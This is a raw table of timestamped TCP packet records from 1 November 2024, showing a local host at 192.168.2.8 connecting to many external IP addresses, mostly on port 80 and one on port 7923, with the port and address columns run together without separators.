                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.874171972 CET4986880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.170634031 CET4987580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.171138048 CET804987018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.171330929 CET4987080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.175487995 CET804987518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.175647020 CET4987580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.175878048 CET4987580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.175901890 CET4987580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.176476002 CET804987018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.179631948 CET4987080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.181020021 CET804987518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.181225061 CET804987518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.219749928 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.229547024 CET4987780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.234735012 CET804987718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.235645056 CET4987780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.235758066 CET4987780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.235780001 CET4987780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.240869999 CET804987718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.240881920 CET804987718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.299266100 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.033015013 CET804987518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.033227921 CET4987580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.038361073 CET804987518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.039292097 CET4987580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.074980021 CET804987718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.075747967 CET4987780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.086914062 CET804987718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.087637901 CET4987780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.123186111 CET4988280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.128050089 CET804988244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.128101110 CET4988280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.128283024 CET4988280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.128283024 CET4988280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.133121014 CET804988244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.133205891 CET804988244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.268409967 CET4988380192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.273614883 CET80498833.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.274703026 CET4988380192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.274975061 CET4988380192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.275019884 CET4988380192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.280014992 CET80498833.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.280293941 CET80498833.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.393049955 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.397852898 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.663177967 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.666369915 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.671197891 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.821480989 CET804988244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.821666956 CET4988280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.826703072 CET804988244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.827778101 CET4988280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.871751070 CET4988880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.876568079 CET804988854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.876775026 CET4988880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.876946926 CET4988880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.876962900 CET4988880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.881995916 CET804988854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.882009029 CET804988854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.247014999 CET80498833.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.247730017 CET4988380192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.253000975 CET80498833.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.254390001 CET4988380192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.438632965 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.443495035 CET804989185.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.443557024 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.444330931 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.444366932 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.449104071 CET804989185.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.449239969 CET804989185.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.549304962 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.800913095 CET804988854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.801465034 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.802247047 CET4988880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.809408903 CET804988854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.811636925 CET4988880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.848944902 CET4989580192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.853960037 CET80498953.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.854501009 CET4989580192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.854652882 CET4989580192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.854671001 CET4989580192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.859376907 CET80498953.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.860045910 CET80498953.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.039218903 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.039886951 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.044487000 CET8049761208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.044547081 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.045347929 CET804980585.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.045396090 CET4980580192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.077138901 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.079936981 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.084867001 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.306997061 CET804989185.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.307116032 CET804989185.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.307207108 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.481360912 CET4990080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.486272097 CET804990047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.486408949 CET4990080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.486875057 CET4990080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.487070084 CET4990080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.491697073 CET804990047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.491903067 CET804990047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.842029095 CET80498953.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.842171907 CET4989580192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.847573042 CET80498953.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.847636938 CET4989580192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.893948078 CET4990280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.898847103 CET804990218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.899646044 CET4990280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.899763107 CET4990280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.899786949 CET4990280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.904603004 CET804990218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.904623985 CET804990218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:44.950238943 CET804990047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:44.951806068 CET4990080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:44.957437992 CET804990047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:44.957492113 CET4990080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.328772068 CET804990218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.330584049 CET4990280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.336209059 CET804990218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.337604046 CET4990280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.387104988 CET4991280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.391995907 CET804991234.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.392071009 CET4991280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.392642021 CET4991280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.392669916 CET4991280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.397454023 CET804991234.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.397483110 CET804991234.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.402498960 CET4991380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.407459974 CET804991334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.407525063 CET4991380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.410393000 CET4991380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.410423040 CET4991380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.415152073 CET804991334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.415163994 CET804991334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.298280954 CET804991334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.299740076 CET4991380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.304855108 CET804991334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.304910898 CET4991380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.357059002 CET804991234.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.357305050 CET4991280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.362360954 CET804991234.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.362962961 CET4991280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.409625053 CET4991980192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.414490938 CET804991947.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.414551020 CET4991980192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.414691925 CET4991980192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.414838076 CET4991980192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.419641972 CET804991947.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.419652939 CET804991947.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.487890959 CET4992080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.492695093 CET804992047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.492960930 CET4992080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.493212938 CET4992080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.493212938 CET4992080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.497997046 CET804992047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.498009920 CET804992047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.957312107 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.962366104 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.228046894 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.232961893 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.237829924 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.873754978 CET804991947.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.875746012 CET4991980192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.881225109 CET804991947.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.883642912 CET4991980192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.938565016 CET4993080192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.945072889 CET80499303.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.945151091 CET4993080192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.945707083 CET4993080192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.945744038 CET4993080192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.950896978 CET80499303.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.950911999 CET80499303.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.961424112 CET804992047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.963527918 CET4992080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.976099014 CET804992047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.979474068 CET4992080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.235349894 CET4993280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.240289927 CET804993218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.240360022 CET4993280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.240483999 CET4993280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.240516901 CET4993280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.245384932 CET804993218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.245399952 CET804993218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.608784914 CET80499303.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.611608028 CET4993080192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.616770029 CET80499303.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.617666006 CET4993080192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.718585968 CET4993780192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.723622084 CET804993735.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.723702908 CET4993780192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.723855972 CET4993780192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.723880053 CET4993780192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.728625059 CET804993735.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.728990078 CET804993735.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.912839890 CET804993218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.916661978 CET4993280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.921828032 CET804993218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.923909903 CET4993280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.097876072 CET4993980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.102745056 CET804993913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.102822065 CET4993980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.103034019 CET4993980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.103063107 CET4993980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.107881069 CET804993913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.107897997 CET804993913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.580683947 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.855303049 CET804993735.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.855326891 CET804993735.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.855338097 CET804993735.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.855391026 CET4993780192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.856986046 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.992664099 CET4993780192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.997458935 CET804993735.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.122257948 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.165460110 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.170233011 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.367002964 CET4994980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.371841908 CET804994918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.371942997 CET4994980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.374330044 CET4994980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.374361038 CET4994980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.379111052 CET804994918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.379179955 CET804994918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.530551910 CET8049787165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.530647993 CET4978780192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.530802965 CET4978780192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.535840988 CET8049787165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.536510944 CET804993913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.536762953 CET4993980192.168.2.813.251.16.150
